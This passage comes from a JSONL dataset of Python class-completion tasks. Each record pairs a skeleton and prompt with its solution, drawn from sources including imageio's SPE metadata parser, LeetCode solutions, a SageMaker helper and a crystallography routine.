:py:meth:`get_datetime`). Use :py:meth:`extract_metadata` to update the metadata dict.\"\"\"\n\n def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]:\n \"\"\"Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. ``-1, -1`` if detection failed.\"\"\"\n <|body_0|>\n\n def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]:\n \"\"\"Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata\"\"\"\n <|body_1|>\n\n def get_datetime(date: str, time: str) -> Union[datetime, None]:\n \"\"\"Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. Returns ------- File's datetime if parsing was succsessful, else None.\"\"\"\n <|body_2|>\n\n def extract_metadata(meta: Mapping, char_encoding: str='latin1'):\n \"\"\"Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. char_encoding Character encoding used to decode strings in the metadata.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SDTControlSpec:\n \"\"\"Extract metadata written by the SDT-control software Some of it is encoded in the comment strings (see :py:meth:`parse_comments`). Also, date and time are encoded in a peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata` to update the metadata dict.\"\"\"\n\n def get_comment_version(comments: Sequence[str]) -> Tuple[int, int]:\n \"\"\"Get the version of SDT-control metadata encoded in the comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. Returns ------- Major and minor version. ``-1, -1`` if detection failed.\"\"\"\n if comments[4][70:76] != 'COMVER':\n return (-1, -1)\n try:\n return (int(comments[4][76:78]), int(comments[4][78:80]))\n except ValueError:\n return (-1, -1)\n\n def parse_comments(comments: Sequence[str], version: Tuple[int, int]) -> Dict[str, Any]:\n \"\"\"Extract SDT-control metadata from comments Parameters ---------- comments List of SPE file comments, typically ``metadata[\"comments\"]``. version Major and minor version of SDT-control metadata format Returns ------- Dict of metadata\"\"\"\n sdt_md = {}\n for minor in range(version[1] + 1):\n try:\n cmt = __class__.comment_fields[version[0], minor]\n except KeyError:\n continue\n for name, spec in cmt.items():\n try:\n v = spec.cvt(comments[spec.n][spec.slice])\n if spec.scale is not None:\n v *= spec.scale\n sdt_md[name] = v\n except Exception as e:\n warnings.warn(f'Failed to decode SDT-control metadata field `{name}`: {e}')\n sdt_md[name] = None\n if version not in __class__.comment_fields:\n supported_ver = ', '.join(map(lambda x: f'{x[0]}.{x[1]:02}', __class__.comment_fields))\n warnings.warn(f'Unsupported SDT-control metadata version {version[0]}.{version[1]:02}. Only versions {supported_ver} are supported. Some or all SDT-control metadata may be missing.')\n comment = comments[0] + comments[2]\n sdt_md['comment'] = comment.strip()\n return sdt_md\n\n def get_datetime(date: str, time: str) -> Union[datetime, None]:\n \"\"\"Turn date and time saved by SDT-control into proper datetime object Parameters ---------- date SPE file date, typically ``metadata[\"date\"]``. time SPE file date, typically ``metadata[\"time_local\"]``. Returns ------- File's datetime if parsing was succsessful, else None.\"\"\"\n try:\n month = __class__.months[date[2:5]]\n return datetime(int(date[5:9]), month, int(date[0:2]), int(time[0:2]), int(time[2:4]), int(time[4:6]))\n except Exception as e:\n logger.info(f'Failed to decode date from SDT-control metadata: {e}.')\n\n def extract_metadata(meta: Mapping, char_encoding: str='latin1'):\n \"\"\"Extract SDT-control metadata from SPE metadata SDT-control stores some metadata in comments and other fields. Extract them and remove unused entries. Parameters ---------- meta SPE file metadata. Modified in place. char_encoding Character encoding used to decode strings in the metadata.\"\"\"\n comver = __class__.get_comment_version(meta['comments'])\n if any((c < 0 for c in comver)):\n logger.debug('SDT-control comments not found.')\n return\n sdt_meta = __class__.parse_comments(meta['comments'], comver)\n meta.pop('comments')\n meta.update(sdt_meta)\n dt = __class__.get_datetime(meta['date'], meta['time_local'])\n if dt:\n meta['datetime'] = dt\n meta.pop('date')\n meta.pop('time_local')\n sp4 = meta['spare_4']\n try:\n meta['modulation_script'] = sp4.decode(char_encoding)\n meta.pop('spare_4')\n except UnicodeDecodeError:\n warnings.warn('Failed to decode SDT-control laser modulation script. Bad char_encoding?')\n meta.pop('time_utc')\n meta.pop('exposure_sec')\n", "source": "the_stack_v2_python_sparse", "source_path": "imageio/plugins/spe.py", "source_repo": "imageio/imageio", "split": "test", "star_events_count": 1332} {"blob_id": "88a8d28ca9bfadf87df1165a5f526f1aaabfcf56", "bodies": ["target = sum\nmemo = {0: 1}\n\ndef dfs(node, cursum):\n if not node:\n return 0\n cursum += node.val\n count = memo.get(cursum - target, 0)\n memo[cursum] = memo.get(cursum, 0) + 1\n sub = dfs(node.left, cursum) + dfs(node.right, cursum)\n memo[cursum] -= 1\n return count + sub\nreturn dfs(root, 0)", "def dfs(node, sumlist):\n if not node:\n return 0\n sumlist = [num + node.val for num in sumlist] + [node.val]\n return sumlist.count(sum) + dfs(node.left, sumlist) + dfs(node.right, sumlist)\nreturn dfs(root, [])"], "bodies_text": "<|body_start_0|>\n target = sum\n memo = {0: 1}\n\n def dfs(node, cursum):\n if not node:\n return 0\n cursum += node.val\n count = memo.get(cursum - target, 0)\n memo[cursum] = memo.get(cursum, 0) + 1\n sub = dfs(node.left, cursum) + dfs(node.right, cursum)\n memo[cursum] -= 1\n return count + sub\n return dfs(root, 0)\n<|end_body_0|>\n\n<|body_start_1|>\n def dfs(node, sumlist):\n if not node:\n return 0\n sumlist = [num + node.val for num in sumlist] + [node.val]\n return sumlist.count(sum) + dfs(node.left, sumlist) + dfs(node.right, sumlist)\n return dfs(root, [])\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def pathSum1(self, root: TreeNode, sum: int) -> int:\n \"\"\"前缀和+记忆优化,参考560题解\"\"\"\n <|body_0|>\n\n def pathSum2(self, root: TreeNode, sum: int) -> int:\n \"\"\"https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n target = sum\n memo = {0: 1}\n\n def dfs(node, cursum):\n if not node:\n return 0\n cursum += node.val\n count = memo.get(cursum - target, 0)\n memo[cursum] = memo.get(cursum, 0) + 1\n sub = dfs(node.left, cursum) + dfs(node.right, cursum)\n memo[cursum] -= 1\n return count + sub\n return dfs(root, 0)\n<|end_body_0|>\n\n<|body_start_1|>\n def dfs(node, sumlist):\n if not node:\n return 0\n sumlist = [num + node.val for num in sumlist] + [node.val]\n return sumlist.count(sum) + dfs(node.left, sumlist) + dfs(node.right, sumlist)\n return dfs(root, [])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000212", "length_bytes": 1916, "license_type": "no_license", "methods": [{"docstring": "前缀和+记忆优化,参考560题解", "name": "pathSum1", "signature": "def pathSum1(self, root: TreeNode, sum: int) -> int"}, {"docstring": "https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/", "name": "pathSum2", "signature": "def pathSum2(self, root: TreeNode, sum: int) -> int"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def pathSum1(self, root: TreeNode, sum: int) -> int: 前缀和+记忆优化,参考560题解\n- def pathSum2(self, root: TreeNode, sum: int) -> int: https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def pathSum1(self, root: TreeNode, sum: int) -> int: 前缀和+记忆优化,参考560题解\n- def pathSum2(self, root: TreeNode, sum: int) -> int: https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/\n\n<|skeleton|>\nclass Solution:\n\n def pathSum1(self, root: TreeNode, sum: int) -> int:\n \"\"\"前缀和+记忆优化,参考560题解\"\"\"\n <|body_0|>\n\n def pathSum2(self, root: TreeNode, sum: int) -> int:\n \"\"\"https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n target = sum\n memo = {0: 1}\n\n def dfs(node, cursum):\n if not node:\n return 0\n cursum += node.val\n count = memo.get(cursum - target, 0)\n memo[cursum] = memo.get(cursum, 0) + 1\n sub = dfs(node.left, cursum) + dfs(node.right, cursum)\n memo[cursum] -= 1\n return count + sub\n return dfs(root, 0)\n<|end_body_0|>\n\n<|body_start_1|>\n def dfs(node, sumlist):\n if not node:\n return 0\n sumlist = [num + node.val for num in sumlist] + [node.val]\n return sumlist.count(sum) + dfs(node.left, sumlist) + dfs(node.right, sumlist)\n return dfs(root, [])\n<|end_body_1|>\n", "revision_id": "2bbb1640589aab34f2bc42489283033cc11fb885", "skeleton": "<|skeleton|>\nclass Solution:\n\n def pathSum1(self, root: TreeNode, sum: int) -> int:\n \"\"\"前缀和+记忆优化,参考560题解\"\"\"\n <|body_0|>\n\n def pathSum2(self, root: TreeNode, sum: int) -> int:\n \"\"\"https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def pathSum1(self, root: TreeNode, sum: int) -> int:\n \"\"\"前缀和+记忆优化,参考560题解\"\"\"\n target = sum\n memo = {0: 1}\n\n def dfs(node, cursum):\n if not node:\n return 0\n cursum += node.val\n count = memo.get(cursum - target, 0)\n memo[cursum] = memo.get(cursum, 0) + 1\n sub = dfs(node.left, cursum) + dfs(node.right, cursum)\n memo[cursum] -= 1\n return count + sub\n return dfs(root, 0)\n\n def pathSum2(self, root: TreeNode, sum: int) -> int:\n \"\"\"https://leetcode-cn.com/problems/path-sum-iii/solution/437zhi-xu-yi-ci-di-gui-wu-xing-dai-ma-yong-lie-bia/\"\"\"\n def dfs(node, sumlist):\n if not node:\n return 0\n sumlist = [num + node.val for num in sumlist] + [node.val]\n return sumlist.count(sum) + dfs(node.left, sumlist) + dfs(node.right, sumlist)\n return dfs(root, [])\n", "source": "the_stack_v2_python_sparse", "source_path": "437_path-sum-iii.py", "source_repo": "helloocc/algorithm", "split": "test", "star_events_count": 1} {"blob_id": "9601099aeb23c6effaa1c726a3cd6e6a0d2e52be", "bodies": ["if x < 0:\n return False\nif x < 10:\n return True\nl = []\nl.append(x % 10)\nx //= 10\nwhile x != 0:\n l.append(x % 10)\n x //= 10\nleft = 0\nright = len(l) - 1\nwhile left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\nreturn True", "if x < 0:\n return False\nl = list(str(x))\nn = len(l)\nif n == 1:\n return True\nleft = 0\nright = len(l) - 1\nwhile left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\nreturn True"], "bodies_text": "<|body_start_0|>\n if x < 0:\n return False\n if x < 10:\n return True\n l = []\n l.append(x % 10)\n x //= 10\n while x != 0:\n l.append(x % 10)\n x //= 10\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if x < 0:\n return False\n l = list(str(x))\n n = len(l)\n if n == 1:\n return True\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def isPalindrome(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n <|body_0|>\n\n def isPalindrome0(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if x < 0:\n return False\n if x < 10:\n return True\n l = []\n l.append(x % 10)\n x //= 10\n while x != 0:\n l.append(x % 10)\n x //= 10\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if x < 0:\n return False\n l = list(str(x))\n n = len(l)\n if n == 1:\n return True\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000213", "length_bytes": 1118, "license_type": "no_license", "methods": [{"docstring": ":type x: int :rtype: bool", "name": "isPalindrome", "signature": "def isPalindrome(self, x)"}, {"docstring": ":type x: int :rtype: bool", "name": "isPalindrome0", "signature": "def isPalindrome0(self, x)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def isPalindrome(self, x): :type x: int :rtype: bool\n- def isPalindrome0(self, x): :type x: int :rtype: bool", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def isPalindrome(self, x): :type x: int :rtype: bool\n- def isPalindrome0(self, x): :type x: int :rtype: bool\n\n<|skeleton|>\nclass Solution:\n\n def isPalindrome(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n <|body_0|>\n\n def isPalindrome0(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if x < 0:\n return False\n if x < 10:\n return True\n l = []\n l.append(x % 10)\n x //= 10\n while x != 0:\n l.append(x % 10)\n x //= 10\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if x < 0:\n return False\n l = list(str(x))\n n = len(l)\n if n == 1:\n return True\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n<|end_body_1|>\n", "revision_id": "6e18c5d257840489cc3fb1079ae3804c743982a4", "skeleton": "<|skeleton|>\nclass Solution:\n\n def isPalindrome(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n <|body_0|>\n\n def isPalindrome0(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def isPalindrome(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n if x < 0:\n return False\n if x < 10:\n return True\n l = []\n l.append(x % 10)\n x //= 10\n while x != 0:\n l.append(x % 10)\n x //= 10\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n\n def isPalindrome0(self, x):\n \"\"\":type x: int :rtype: bool\"\"\"\n if x < 0:\n return False\n l = list(str(x))\n n = len(l)\n if n == 1:\n return True\n left = 0\n right = len(l) - 1\n while left <= right:\n if l[left] != l[right]:\n return False\n left += 1\n right -= 1\n return True\n", "source": "the_stack_v2_python_sparse", "source_path": "9.回文数.py", "source_repo": "yangyuxiang1996/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "0999d53004b338a7f628448d206e02e93949c757", "bodies": ["if name.startswith('_') and hasattr(self, name[1:]):\n name = name[1:]\nreturn name", "if attr in self.__class__.__dict__:\n return isinstance(self.__class__.__dict__[attr], _SkipEncodingDecoding)\nreturn False", "request_data = {}\nfor attr, value in self.__dict__.items():\n if value is not None:\n name = self._clean_descriptor_name(attr)\n if not self._skip_encoding(name):\n request_data[name] = value\nreturn request_data"], "bodies_text": "<|body_start_0|>\n if name.startswith('_') and hasattr(self, name[1:]):\n name = name[1:]\n return name\n<|end_body_0|>\n\n<|body_start_1|>\n if attr in self.__class__.__dict__:\n return isinstance(self.__class__.__dict__[attr], _SkipEncodingDecoding)\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n request_data = {}\n for attr, value in self.__dict__.items():\n if value is not None:\n name = self._clean_descriptor_name(attr)\n if not self._skip_encoding(name):\n request_data[name] = value\n return request_data\n<|end_body_2|>\n", "class_docstring": "Provide a default behavior for to_request_dict method.", "class_name": "_DefaultToRequestDict", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass _DefaultToRequestDict:\n \"\"\"Provide a default behavior for to_request_dict method.\"\"\"\n\n def _clean_descriptor_name(self, name: str):\n \"\"\"Update the attribute name to be the same as schema. Args: name (str): attribute name.\"\"\"\n <|body_0|>\n\n def _skip_encoding(self, attr: str):\n \"\"\"Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor\"\"\"\n <|body_1|>\n\n def _to_request_dict(self):\n \"\"\"Implement this method in a subclass to return a custom request_dict.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if name.startswith('_') and hasattr(self, name[1:]):\n name = name[1:]\n return name\n<|end_body_0|>\n\n<|body_start_1|>\n if attr in self.__class__.__dict__:\n return isinstance(self.__class__.__dict__[attr], _SkipEncodingDecoding)\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n request_data = {}\n for attr, value in self.__dict__.items():\n if value is not None:\n name = self._clean_descriptor_name(attr)\n if not self._skip_encoding(name):\n request_data[name] = value\n return request_data\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000214", "length_bytes": 16025, "license_type": "permissive", "methods": [{"docstring": "Update the attribute name to be the same as schema. Args: name (str): attribute name.", "name": "_clean_descriptor_name", "signature": "def _clean_descriptor_name(self, name: str)"}, {"docstring": "Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor", "name": "_skip_encoding", "signature": "def _skip_encoding(self, attr: str)"}, {"docstring": "Implement this method in a subclass to return a custom request_dict.", "name": "_to_request_dict", "signature": "def _to_request_dict(self)"}], "n_methods": 3, "prompt": "Implement the Python class `_DefaultToRequestDict` described below.\n\nClass description:\nProvide a default behavior for to_request_dict method.\n\nMethod signatures and docstrings:\n- def _clean_descriptor_name(self, name: str): Update the attribute name to be the same as schema. Args: name (str): attribute name.\n- def _skip_encoding(self, attr: str): Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor\n- def _to_request_dict(self): Implement this method in a subclass to return a custom request_dict.", "prompted_full_text": "Implement the Python class `_DefaultToRequestDict` described below.\n\nClass description:\nProvide a default behavior for to_request_dict method.\n\nMethod signatures and docstrings:\n- def _clean_descriptor_name(self, name: str): Update the attribute name to be the same as schema. Args: name (str): attribute name.\n- def _skip_encoding(self, attr: str): Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor\n- def _to_request_dict(self): Implement this method in a subclass to return a custom request_dict.\n\n<|skeleton|>\nclass _DefaultToRequestDict:\n \"\"\"Provide a default behavior for to_request_dict method.\"\"\"\n\n def _clean_descriptor_name(self, name: str):\n \"\"\"Update the attribute name to be the same as schema. Args: name (str): attribute name.\"\"\"\n <|body_0|>\n\n def _skip_encoding(self, attr: str):\n \"\"\"Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor\"\"\"\n <|body_1|>\n\n def _to_request_dict(self):\n \"\"\"Implement this method in a subclass to return a custom request_dict.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if name.startswith('_') and hasattr(self, name[1:]):\n name = name[1:]\n return name\n<|end_body_0|>\n\n<|body_start_1|>\n if attr in self.__class__.__dict__:\n return isinstance(self.__class__.__dict__[attr], _SkipEncodingDecoding)\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n request_data = {}\n for attr, value in self.__dict__.items():\n if value is not None:\n name = self._clean_descriptor_name(attr)\n if not self._skip_encoding(name):\n request_data[name] = value\n return request_data\n<|end_body_2|>\n", "revision_id": "8d5d7fd8ae1a917ed3e2b988d5e533bce244fd85", "skeleton": "<|skeleton|>\nclass _DefaultToRequestDict:\n \"\"\"Provide a default behavior for to_request_dict method.\"\"\"\n\n def _clean_descriptor_name(self, name: str):\n \"\"\"Update the attribute name to be the same as schema. Args: name (str): attribute name.\"\"\"\n <|body_0|>\n\n def _skip_encoding(self, attr: str):\n \"\"\"Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor\"\"\"\n <|body_1|>\n\n def _to_request_dict(self):\n \"\"\"Implement this method in a subclass to return a custom request_dict.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class _DefaultToRequestDict:\n \"\"\"Provide a default behavior for to_request_dict method.\"\"\"\n\n def _clean_descriptor_name(self, name: str):\n \"\"\"Update the attribute name to be the same as schema. Args: name (str): attribute name.\"\"\"\n if name.startswith('_') and hasattr(self, name[1:]):\n name = name[1:]\n return name\n\n def _skip_encoding(self, attr: str):\n \"\"\"Skip encoding if the attribute is an instance of _SkipEncodingDecoding descriptor\"\"\"\n if attr in self.__class__.__dict__:\n return isinstance(self.__class__.__dict__[attr], _SkipEncodingDecoding)\n return False\n\n def _to_request_dict(self):\n \"\"\"Implement this method in a subclass to return a custom request_dict.\"\"\"\n request_data = {}\n for attr, value in self.__dict__.items():\n if value is not None:\n name = self._clean_descriptor_name(attr)\n if not self._skip_encoding(name):\n request_data[name] = value\n return request_data\n", "source": "the_stack_v2_python_sparse", "source_path": "src/sagemaker/model_card/helpers.py", "source_repo": "aws/sagemaker-python-sdk", "split": "test", "star_events_count": 2050} {"blob_id": "fd8fc14510a0d3184fb16bc9cb5dba0dac443f25", "bodies": ["def helper(cur):\n if not cur:\n return\n ans.append(cur.val)\n helper(cur.left)\n helper(cur.right)\n return ans\nans = []\nhelper(root)\nreturn ','.join([str(elem) for elem in ans])", "def helper(target, cur):\n if not cur:\n return TreeNode(target)\n elif target < cur.val:\n cur.left = helper(target, cur.left)\n elif target > cur.val:\n cur.right = helper(target, cur.right)\n return cur\nif not data:\n return None\ndata = data.split(',')\ndata = [int(elem) for elem in data]\nroot = TreeNode(data[0])\nfor i in range(1, len(data)):\n helper(data[i], root)\nreturn root"], "bodies_text": "<|body_start_0|>\n def helper(cur):\n if not cur:\n return\n ans.append(cur.val)\n helper(cur.left)\n helper(cur.right)\n return ans\n ans = []\n helper(root)\n return ','.join([str(elem) for elem in ans])\n<|end_body_0|>\n\n<|body_start_1|>\n def helper(target, cur):\n if not cur:\n return TreeNode(target)\n elif target < cur.val:\n cur.left = helper(target, cur.left)\n elif target > cur.val:\n cur.right = helper(target, cur.right)\n return cur\n if not data:\n return None\n data = data.split(',')\n data = [int(elem) for elem in data]\n root = TreeNode(data[0])\n for i in range(1, len(data)):\n helper(data[i], root)\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def helper(cur):\n if not cur:\n return\n ans.append(cur.val)\n helper(cur.left)\n helper(cur.right)\n return ans\n ans = []\n helper(root)\n return ','.join([str(elem) for elem in ans])\n<|end_body_0|>\n\n<|body_start_1|>\n def helper(target, cur):\n if not cur:\n return TreeNode(target)\n elif target < cur.val:\n cur.left = helper(target, cur.left)\n elif target > cur.val:\n cur.right = helper(target, cur.right)\n return cur\n if not data:\n return None\n data = data.split(',')\n data = [int(elem) for elem in data]\n root = TreeNode(data[0])\n for i in range(1, len(data)):\n helper(data[i], root)\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000215", "length_bytes": 5056, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string.", "name": "serialize", "signature": "def serialize(self, root: TreeNode) -> str"}, {"docstring": "Decodes your encoded data to tree.", "name": "deserialize", "signature": "def deserialize(self, data: str) -> TreeNode"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: TreeNode) -> str: Encodes a tree to a single string.\n- def deserialize(self, data: str) -> TreeNode: Decodes your encoded data to tree.", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: TreeNode) -> str: Encodes a tree to a single string.\n- def deserialize(self, data: str) -> TreeNode: Decodes your encoded data to tree.\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def helper(cur):\n if not cur:\n return\n ans.append(cur.val)\n helper(cur.left)\n helper(cur.right)\n return ans\n ans = []\n helper(root)\n return ','.join([str(elem) for elem in ans])\n<|end_body_0|>\n\n<|body_start_1|>\n def helper(target, cur):\n if not cur:\n return TreeNode(target)\n elif target < cur.val:\n cur.left = helper(target, cur.left)\n elif target > cur.val:\n cur.right = helper(target, cur.right)\n return cur\n if not data:\n return None\n data = data.split(',')\n data = [int(elem) for elem in data]\n root = TreeNode(data[0])\n for i in range(1, len(data)):\n helper(data[i], root)\n return root\n<|end_body_1|>\n", "revision_id": "1abc28919abb55b93d3879860ac9c1297d493d09", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\"\"\"\n def helper(cur):\n if not cur:\n return\n ans.append(cur.val)\n helper(cur.left)\n helper(cur.right)\n return ans\n ans = []\n helper(root)\n return ','.join([str(elem) for elem in ans])\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\"\"\"\n def helper(target, cur):\n if not cur:\n return TreeNode(target)\n elif target < cur.val:\n cur.left = helper(target, cur.left)\n elif target > cur.val:\n cur.right = helper(target, cur.right)\n return cur\n if not data:\n return None\n data = data.split(',')\n data = [int(elem) for elem in data]\n root = TreeNode(data[0])\n for i in range(1, len(data)):\n helper(data[i], root)\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "lc/449.SerializeAndDeserializeBST.py", "source_repo": "akimi-yano/algorithm-practice", "split": "test", "star_events_count": 0} {"blob_id": "48e6e50a51cd078c1bb44c6d184d1b990277dae5", "bodies": ["dphi2 = scan.get_oscillation(deg=False)[1] / 2.0\ntau, zeta = self._calculate_tau_and_zeta(crystal, beam, detector, goniometer, scan, reflections)\nself.e1 = (tau + dphi2) * flex.abs(zeta) / math.sqrt(2.0)\nself.e2 = (tau - dphi2) * flex.abs(zeta) / math.sqrt(2.0)", "from dials.algorithms.shoebox import MaskCode\nmask_code = MaskCode.Valid | MaskCode.Foreground\nsbox = reflections['shoebox']\nbbox = reflections['bbox']\nphi = reflections['xyzcal.mm'].parts()[2]\nzeta = reflections['zeta']\ntau = []\nzeta2 = []\nfor s, b, p, z in zip(sbox, bbox, phi, zeta):\n for z0, f in enumerate(range(b[4], b[5])):\n phi0 = scan.get_angle_from_array_index(int(f), deg=False)\n phi1 = scan.get_angle_from_array_index(int(f) + 1, deg=False)\n m = s.mask[z0:z0 + 1, :, :]\n if m.count(mask_code) > 0:\n tau.append((phi1 + phi0) / 2.0 - p)\n zeta2.append(z)\nreturn (flex.double(tau), flex.double(zeta2))", "TINY = 1e-10\nassert sigma_m > TINY\na = scitbx.math.erf(self.e1 / sigma_m)\nb = scitbx.math.erf(self.e2 / sigma_m)\nR = (a - b) / 2.0\nassert R.all_ge(0)\nmask = R < TINY\nassert mask.count(True) < len(mask)\nR.set_selected(mask, TINY)\nreturn flex.log(R)"], "bodies_text": "<|body_start_0|>\n dphi2 = scan.get_oscillation(deg=False)[1] / 2.0\n tau, zeta = self._calculate_tau_and_zeta(crystal, beam, detector, goniometer, scan, reflections)\n self.e1 = (tau + dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n self.e2 = (tau - dphi2) * flex.abs(zeta) / math.sqrt(2.0)\n<|end_body_0|>\n\n<|body_start_1|>\n from dials.algorithms.shoebox import MaskCode\n mask_code = MaskCode.Valid | MaskCode.Foreground\n sbox = reflections['shoebox']\n bbox = reflections['bbox']\n phi = reflections['xyzcal.mm'].parts()[2]\n zeta = reflections['zeta']\n 